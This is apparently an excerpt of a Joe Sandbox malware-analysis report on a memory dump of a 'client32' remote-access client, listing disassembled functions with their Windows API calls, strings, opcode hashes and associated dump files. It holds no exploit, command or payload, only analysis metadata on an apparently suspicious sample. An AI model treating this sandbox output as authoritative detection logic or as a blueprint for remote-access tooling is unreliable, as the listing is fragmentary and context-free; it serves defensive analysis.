Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProfileString_memmove
String ID: ,,LPT1:$Device$Windows
API String ID: 1665476579-2967085602
Opcode ID: 5293eee435bb0254d3af0ceeef6233b84e65e05f24e67064fcf0679b2f45fa62
Instruction ID: d236b70db75a299bf341fb478ec63ace14539858087ba077108252d41a473671
Opcode Fuzzy Hash: 5293eee435bb0254d3af0ceeef6233b84e65e05f24e67064fcf0679b2f45fa62
Instruction Fuzzy Hash: 7F112965914217AAEB008F60ED41BF9F768EF8630DF004068ED8497146EA32660DC7B3

Function 11151330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,1101FE8F,000000FF,000000FF,?,?,?,?), ref: 11151398
DeleteObject.GDI32(?), ref: 111513C0
CreateSolidBrush.GDI32(?), ref: 111513C7

Strings

m_hWnd, xrefs: 11151383
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1115137E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: BrushCreateDeleteInvalidateObjectRectSolid
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 186785674-2830328467
Opcode ID: e7385aa901303c78b3f44ba20240c86a8bd8487c7a62bbc86b94179db82a9165
Instruction ID: d54166523ca22a351308597805ec2fddeeb7788c1bc1da20094e1dbc88db0c13
Opcode Fuzzy Hash: e7385aa901303c78b3f44ba20240c86a8bd8487c7a62bbc86b94179db82a9165
Instruction Fuzzy Hash: F111A375600700ABD6A2CAA5C884FDBF7EDAB8D724F104629F67A97281D730B841C760

Function 11033520 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 11033538
GetClassNameA.USER32(?,?,00000400), ref: 11033566

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

ComboBox, xrefs: 11033572
CltAutoLogon.cpp, xrefs: 11033547
IsWindow(hWin), xrefs: 1103354C

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassErrorExitLastMessageNameProcessWindowwsprintf
String ID: CltAutoLogon.cpp$ComboBox$IsWindow(hWin)
API String ID: 2713866921-163732079
Opcode ID: cd6a7bac3ebf91d690e8677b5b5af1557be8e6ecec1642f7759a4ee89803539e
Instruction ID: 4a0122271a1e6dee732544f4cf5d364ab691c190f6ca98b36954de5145b309c8
Opcode Fuzzy Hash: cd6a7bac3ebf91d690e8677b5b5af1557be8e6ecec1642f7759a4ee89803539e
Instruction Fuzzy Hash: DFF0BB75E1262D6BDB00DB658C41FEEF76C9F01209F0000A5FF15A7141EB346A05CBDA

Function 11085250 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(cenctrl.dll), ref: 1108527E
GetProcAddress.KERNEL32(00000000,cenctrl_protection), ref: 11085290

Part of subcall function 11085220: FreeLibrary.KERNEL32(00000000,?,110852A4), ref: 1108522A

Strings

cenctrl_protection, xrefs: 1108528A
EDC, xrefs: 1108525D
cenctrl.dll, xrefs: 11085279

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EDC$cenctrl.dll$cenctrl_protection
API String ID: 145871493-3137230561
Opcode ID: 018cc484e789a0ba753cd2b88e3001078862b69d4cc674c4ddb63821557fc1a9
Instruction ID: 932585225ba93680c2c1ba0b1a206605fbeba0e999b926e23efed67d0442d162
Opcode Fuzzy Hash: 018cc484e789a0ba753cd2b88e3001078862b69d4cc674c4ddb63821557fc1a9
Instruction Fuzzy Hash: D2F09279E0833366E7529F79BC0578EB9C88F5231DF200475F855EA608FE26E48146A3

Function 11017080 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017088
GetWindowLongA.USER32(00000000,000000F0), ref: 11017097
PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 110170B8
SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 110170CB

Strings

IPTip_Main_Window, xrefs: 11017083

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$FindLongPostSend
String ID: IPTip_Main_Window
API String ID: 3445528842-293399287
Opcode ID: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
Instruction ID: 6af0b60b7660b572c498a55ded09fae4f220f0cf1474151e1ef758e6c943b9c3
Opcode Fuzzy Hash: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
Instruction Fuzzy Hash: CBE08638B81B36B6F33357948C8AFDE79449F05B25F118150F722BD5CDCB689480979A

Function 110CF5E0 Relevance: 7.6, APIs: 6, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,33E68B52,00000000,?,?), ref: 110CF617
LeaveCriticalSection.KERNEL32(?,?,00000004,00000010,00000000), ref: 110CF67D
Sleep.KERNEL32(00000064,?,00000004,00000010,00000000), ref: 110CF685
EnterCriticalSection.KERNEL32(?,?,00000004,00000010,00000000), ref: 110CF68C
LeaveCriticalSection.KERNEL32(?), ref: 110CF698
LeaveCriticalSection.KERNEL32(?,?,00000004,00000010,00000000), ref: 110CF6AC

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter$Sleep
String ID:
API String ID: 950586405-0
Opcode ID: 3aac5cfdef626801f3983ee70f40d206c01bc9cd380e9edae22b68155aeb2347
Instruction ID: 0c95b037e16f3f820eead96a384fe2453d93ca3928e38cfcfc51fd66a9b88ab4
Opcode Fuzzy Hash: 3aac5cfdef626801f3983ee70f40d206c01bc9cd380e9edae22b68155aeb2347
Instruction Fuzzy Hash: 6D318F75900619AFD711CFA5C884FAEFBF9EB8CB14F10455DF611A7640D774A900CB61

Function 110250B0 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110250C7
GetDlgItem.USER32(?,00001399), ref: 11025101
TranslateMessage.USER32(?), ref: 1102511A
DispatchMessageA.USER32(?), ref: 11025124
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025166

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchItemTranslate
String ID:
API String ID: 1381171329-0
Opcode ID: d7d6f64767123ac77c136828f01cb5bd314f94f82baacbae38736d6303a924a1
Instruction ID: dd821a99022cde097cd1ec77f7d6b518f4175877e7151a46883bfd48cbb137af
Opcode Fuzzy Hash: d7d6f64767123ac77c136828f01cb5bd314f94f82baacbae38736d6303a924a1
Instruction Fuzzy Hash: FE21A172E0031BABD721DA65CC85FEFB3F8AB44308F908469EA16D6180FB75E401CB95

Function 11023340 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023357
GetDlgItem.USER32(?,00001399), ref: 11023391
TranslateMessage.USER32(?), ref: 110233AA
DispatchMessageA.USER32(?), ref: 110233B4
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110233F6

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchItemTranslate
String ID:
API String ID: 1381171329-0
Opcode ID: 019aa6c52c83fe1587ed026a258feb73206e87ad09fcf7719039eca06c41a3d5
Instruction ID: 2fe2671c3d0e180fd010d3a1df99b375ee62fb8f5781d26c5d033f692c44979c
Opcode Fuzzy Hash: 019aa6c52c83fe1587ed026a258feb73206e87ad09fcf7719039eca06c41a3d5
Instruction Fuzzy Hash: A4218475E0430BABD715DE61CC84BAFB7E8AB48708F808469E615D6280FB74E501CB91

Function 1115F184 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1115F192

Part of subcall function 1115F231: __FF_MSGBANNER.LIBCMT ref: 1115F24A
Part of subcall function 1115F231: __NMSG_WRITE.LIBCMT ref: 1115F251
Part of subcall function 1115F231: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F276

_free.LIBCMT ref: 1115F1A5

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 2959f60e4fa097399b3fb4aa6cbfe99758112040b2c8355d508159745f45fdec
Instruction ID: 8ef5febc85f3c3005cccfb621df11dc0bc5143e6f1d96612d99b576177750d1c
Opcode Fuzzy Hash: 2959f60e4fa097399b3fb4aa6cbfe99758112040b2c8355d508159745f45fdec
Instruction Fuzzy Hash: A811E73A404317AFC7D22F74D944A89FB99AB872BDB214625E8789A140FF71D850C7A2

Function 1103F070 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 1103EF50: DeleteObject.GDI32(?), ref: 1103F03B

CreateRectRgnIndirect.GDI32(?), ref: 1103F0B8
CombineRgn.GDI32(?,?,00000000,00000002), ref: 1103F0CC
DeleteObject.GDI32(00000000), ref: 1103F0D3
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1103F0F6
CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1103F10D

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CombineCreateDeleteObjectRect$Indirect
String ID:
API String ID: 3044651595-0
Opcode ID: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
Instruction ID: 1a364b5fc304c635043762898c597e59b047f122490fce8353d5272088783a6d
Opcode Fuzzy Hash: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
Instruction Fuzzy Hash: 93113031610716AFE721CF64D888B9AF7ECFB44716F10852AF65992180C7B4B891CB53

Function 111250D0 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 111250E6
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,11125158), ref: 111250F0
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11125106
DispatchMessageA.USER32(?), ref: 11125126
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11125132

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchEventPeek
String ID:
API String ID: 364732842-0
Opcode ID: 5ad8bfb49ac7d59e32d7b905cfdba81bb0cd946d71ecb53c76356831993baebd
Instruction ID: 401f307c2c94076a39d8d078573f3404814d65017b221973c2865d559fe2622e
Opcode Fuzzy Hash: 5ad8bfb49ac7d59e32d7b905cfdba81bb0cd946d71ecb53c76356831993baebd
Instruction Fuzzy Hash: 13018676A4031A7AE620DB648CC5FEFB36CAB88B04F608515F711E61C4EBA5A40587B5

Function 110F1150 Relevance: 7.5, APIs: 5, Instructions: 45pipesleepCOMMON

Download Yara Rule

APIs

SetNamedPipeHandleState.KERNEL32(00000000,?,00000000,00000000,?,?,?,110F3729), ref: 110F1165
ConnectNamedPipe.KERNEL32(00000000,00000000,?,?,110F3729), ref: 110F117A
GetLastError.KERNEL32(?,?,110F3729), ref: 110F1180
Sleep.KERNEL32(00000064,?,?,110F3729), ref: 110F118F
SetNamedPipeHandleState.KERNEL32(00000000,00000003,00000000,00000000,?,?,110F3729), ref: 110F11B2

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
